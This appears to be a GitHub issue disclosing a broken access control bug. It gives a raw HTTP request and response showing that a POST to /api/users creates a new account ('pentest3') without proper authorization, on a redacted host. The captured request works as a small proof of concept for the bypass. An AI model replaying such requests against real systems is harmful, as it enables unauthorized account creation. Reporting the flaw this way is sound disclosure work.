【SECURITY】Broken Access Control #1528
Labels
bug
Something isn't working
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Describe the bug
A clear and concise description of what the bug is.
To Reproduce
Steps to reproduce the behavior:
`POST /api/users HTTP/1.1
Host: compass.xxx.com
Cookie: _clck=5viprt%7C2%7Cfoj%7C0%7C1695
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/plain, /
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: xxx
Content-Length: 61
Origin: https://compass.xxx.com
Referer: https://compass.xxx.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
{"role":"normal","username":"pentest3","password":"pentest3"}`
`HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Aug 2024 06:25:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 58
Connection: keep-alive
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With
Access-Control-Allow-Methods: DELETE, POST, OPTIONS, GET, PUT
Access-Control-Allow-Origin: *
Vary: Accept-Encoding,User-Agent
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
{"status":"ok","message":"success","data":null,"error":""}
`
4. A new user has been created successfully.
Expected behavior
The backend interface needs to be authenticated, and requests are prohibited by unauthorized users
The text was updated successfully, but these errors were encountered: